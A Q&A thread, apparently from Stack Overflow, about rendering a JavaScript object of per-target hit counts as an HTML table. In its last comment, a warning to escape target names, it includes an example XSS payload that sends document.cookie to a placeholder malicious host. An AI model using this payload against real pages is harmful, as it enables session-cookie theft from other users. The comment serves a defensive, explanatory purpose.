# Create Table Based on Changing JSON Output

Tags: javascript, html, json

So to GET an output like this, I had to use some pretty cool tricks (see [Analyzing Data from JSON in JavaScript](https://stackoverflow.com/questions/48936860/analyzing-data-from-json-in-javascript)). Please note my data in this example (# rows) is different.

```
var feeds = [].concat.apply([], dataSet_parsed.map(s => s.data));

//flattens arrays AGAIN to show all targets 
var targets = [].concat.apply([], feeds.map(s => s.data));

//return target hits total
    var targetList = targets.reduce(
        function(prev, cur) {
            var val = cur["val"];
            prev[val] = ((prev[val] || 0) + 1);
            return prev;
        }, {});

// Output: {TargetA: 5, TargetB: 6, TargetC: 4, TargetD: 2}
```

Basically, I'm trying to get a count of how many times a target was seen per group. And fantastic! this works.

Here's my question. how do I display the output---

```
{TargetA: 5, TargetB: 6, TargetC: 4, TargetD: 2}
```

---in a table? There are no guarantees that I will always return the same TYPE of Targets (i.e. next load I could have:

```
{TargetK: 10, TargetL: 2, TargetM: 5, TargetN: 3, TargetO: 7, TargetP: 8}
```

I've tried using JSON.stringify and .replace() but I'm not getting very far. And even after that, I don't think I could style that output very well.

```
JSON.stringify(targetList).replace(/\}/g,'').replace(/\{/g,'')
```

Comment: Do you mean you want to use `targets` to generate an HTML string such as `<table><thead><tr><th>Target>/th><th>Count</th></tr></thead><tbody><tr><td>TargetA</td><td>5</td></tr><tr><td>TargetB</td><td>6</td></tr><tr><td>TargetC</td><td>4</td></tr><tr><td>TargetD</td><td>2</td></tr></tbody></table>`? Also, do you care about the order of the rows?

Comment: yes, exactly. 

and order doesn't matter necessarily. it'd be a nice-to-have

Comment: Oh, and make sure you escape the target names properly. For example, if a malicious user creates a target called `<script>var cookie = document.cookie; $.get('http://www.my-malicious-site:666/harvest-cookies?cookie=' + cookie);</script>`, then they can access the session cookies of other users who run your client-side code by listening on `http://www.my-malicious-site:666/harvest-cookies`. https://stackoverflow.com/questions/6234773/can-i-escape-html-special-chars-in-javascript discusses this, and annoyingly javascript doesn't seem to have a built-in way of doing it nicely.